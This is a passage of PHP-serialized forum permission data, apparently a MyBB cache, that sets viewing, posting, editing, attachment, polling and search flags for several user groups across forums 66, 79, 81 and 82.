\"66\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:13;a:18:{s:3:\"pid\";s:3:\"379\";s:3:\"fid\";s:2:\"66\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"380\";s:3:\"fid\";s:2:\"66\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"665\";s:3:\"fid\";s:2:\"66\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:21;a:18:{s:3:\"pid\";s:3:\"780\";s:3:\"fid\";s:2:\"66\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:79;a:11:{i:1;a:18:{s:3:\"pid\";s:3:\"564\";s:3:\"fid\";s:2:\"79\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"565\";s:3:\"fid\";s:2:\"79\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:9;a:18:{s:3:\"pid\";s:3:\"568\";s:3:\"fid\";s:2:\"79\";s:3:\"gid\";s:1:\"9\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:5;a:18:{s:3:\"pid\";s:3:\"566\";s:3:\"fid\";s:2:\"79\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"567\";s:3:\"fid\";s:2:\"79\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"569\";s:3:\"fid\";s:2:\"79\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:13;a:18:{s:3:\"pid\";s:3:\"570\";s:3:\"fid\";s:2:\"79\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"571\";s:3:\"fid\";s:2:\"79\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:17;a:18:{s:3:\"pid\";s:3:\"572\";s:3:\"fid\";s:2:\"79\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"667\";s:3:\"fid\";s:2:\"79\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:21;a:18:{s:3:\"pid\";s:3:\"782\";s:3:\"fid\";s:2:\"79\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:81;a:12:{i:1;a:18:{s:3:\"pid\";s:3:\"708\";s:3:\"fid\";s:2:\"81\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"709\";s:3:\"fid\";s:2:\"81\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:9;a:18:{s:3:\"pid\";s:3:\"713\";s:3:\"fid\";s:2:\"81\";s:3:\"gid\";s:1:\"9\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:5;a:18:{s:3:\"pid\";s:3:\"710\";s:3:\"fid\";s:2:\"81\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:6;a:18:{s:3:\"pid\";s:3:\"711\";s:3:\"fid\";s:2:\"81\";s:3:\"gid\";s:1:\"6\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"712\";s:3:\"fid\";s:2:\"81\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"714\";s:3:\"fid\";s:2:\"81\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:12;a:18:{s:3:\"pid\";s:3:\"715\";s:3:\"fid\";s:2:\"81\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:13;a:18:{s:3:\"pid\";s:3:\"716\";s:3:\"fid\";s:2:\"81\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"717\";s:3:\"fid\";s:2:\"81\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:17;a:18:{s:3:\"pid\";s:3:\"718\";s:3:\"fid\";s:2:\"81\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:21;a:18:{s:3:\"pid\";s:3:\"784\";s:3:\"fid\";s:2:\"81\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:82;a:12:{i:1;a:18:{s:3:\"pid\";s:3:\"788\";s:3:\"fid\";s:2:\"82\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"789\";s:3:\"fid\";s:2:\"82\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:9;a:18:{s:3:\"pid\";s:3:\"793\";s:3:\"fid\";s:2:\"82\";s:3:\"gid\";s:1:\"9\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:5;a:18:{s:3:\"pid\";s:3:\"790\";s:3:\"fid\";s:2:\"82\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:6;a:18:{s:3:\"pid\";s:3:\"791\";s:3:\"fid\";s:2:\"82\";s:3:\"gid\";s:1:\"6\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"792\";s:3:\"fid\";s:2:\"82\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"794\";s:3:\"fid\";s:2:\"82\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:12;a:18:{s:3:\"pid\";s:3:\"795\";s:3:\"fid\";s:2:\"82\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:13;a:18:{s:3:\"pid\";s:3:\"796\";s:3:\"fid\";s:2:\"82\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0